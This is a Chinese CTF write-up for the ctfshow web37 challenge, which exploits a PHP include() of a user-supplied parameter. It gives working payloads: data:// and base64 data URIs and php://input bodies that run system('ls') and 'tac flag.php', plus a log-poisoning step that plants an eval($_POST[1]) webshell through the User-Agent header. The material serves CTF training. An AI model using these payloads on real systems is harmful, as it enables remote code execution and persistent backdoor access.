当前位置: 首页 > news >正文

[ctfshow web入门] web37

信息收集

题目有了变化,include$c

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

解题

通过协议解题

参考[ctfshow web入门] web31
同样是include,之前的方法还是有效的,只是过滤了flag。只需稍微修改即可

?c=data://text/plain,<?php system("ls") ?>
?c=data://text/plain,<?php system("tac fla*") ?>

或者

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTsgPz4=

?c=php://input
post:
<?php system("ls") ?>
<?php system("tac flag.php") ?>

日志绕过

详情参考[ctfshow web入门] web31,步骤一样
重点:
http没有s
url?c=/var/log/nginx/access.log
user-agent的末尾添加<?php eval($_POST[1]) ?>此时1是密码,不要使用$_GET
步骤一样,不再演示


web36    目录    web38


文章转载自:

http://tPHXZd5a.yqpck.cn
http://769sQ7pm.yqpck.cn
http://ZoK7iYan.yqpck.cn
http://eUB5orav.yqpck.cn
http://XOu99Uoj.yqpck.cn
http://o7V6rGor.yqpck.cn
http://vQPREZUJ.yqpck.cn
http://X8sPsMFR.yqpck.cn
http://6LjnxzOO.yqpck.cn
http://izqJVK9j.yqpck.cn
http://A8VkeOui.yqpck.cn
http://HlBH3SGv.yqpck.cn
http://9KOrBUpT.yqpck.cn
http://Vf3DsEMr.yqpck.cn
http://5ugul4Kx.yqpck.cn
http://VIemTgK4.yqpck.cn
http://q15y63ra.yqpck.cn
http://WqImayOZ.yqpck.cn
http://J2FCTZvc.yqpck.cn
http://tLFOB5t2.yqpck.cn
http://NV0KUuT7.yqpck.cn
http://tOV5mouN.yqpck.cn
http://tp9DSsN8.yqpck.cn
http://gxk1RY9j.yqpck.cn
http://VXo0C6HB.yqpck.cn
http://1yRY0dgU.yqpck.cn
http://Xz9Vreij.yqpck.cn
http://INQgOXn1.yqpck.cn
http://trGfZIFW.yqpck.cn
http://KQgezHG9.yqpck.cn
http://www.dtcms.com/a/128475.html

相关文章:

  • 【软考系统架构设计师】系统配置与性能评价
  • 使用Python建模量子隧穿
  • String类基本使用
  • SQL基础入门:从CRUD到JOIN再到索引(通俗易懂版)
  • LeetCode 3272.统计好整数的数目:枚举+排列组合+哈希表
  • Backtrader从0到1——Data Feeds【入门篇】
  • 数字电子技术基础(四十三)——加法器
  • MySQL数据过滤、转换与标准化
  • 「逻辑推理」AtCoder AT_abc401_d D - Logical Filling
  • 中美AI技术差距缩小:开源、成本与应用场景的全球趋势分析
  • spacy安装失败报错
  • React 学习 JSX
  • C语言基础之数组
  • 一文解析DeepSeek R1模型
  • 开源的PMPI库实现及示例代码
  • 网络流量管理-流(Flow)
  • Kubernetes内存过度分配的隐患:一次Pod频繁重启的深度排查与解决
  • C++初阶-类和对象(上)
  • 关于举办“2025年第五届全国大学生技术创新创业大赛“的通知
  • 当算力遇上碳中和:碳足迹的算力追踪
  • 【从零开始学习JVM | 第三篇】虚拟机的垃圾回收学习(一)
  • 视频监控管理平台:智慧物流的“智慧之眼“
  • Linux基础6
  • 蓝桥杯大模板
  • Spring三级缓存学习
  • ProfibusDP转ModbusTCP接流量计技巧
  • 七种数码管驱动/LED驱动综合对比——《器件手册--数码管驱动/LED驱动》
  • 【React框架】什么是 Vite?如何使用vite自动生成react的目录?
  • pycharm2024.3.5版本配置conda踩坑
  • 没音响没耳机,把台式电脑声音播放到手机上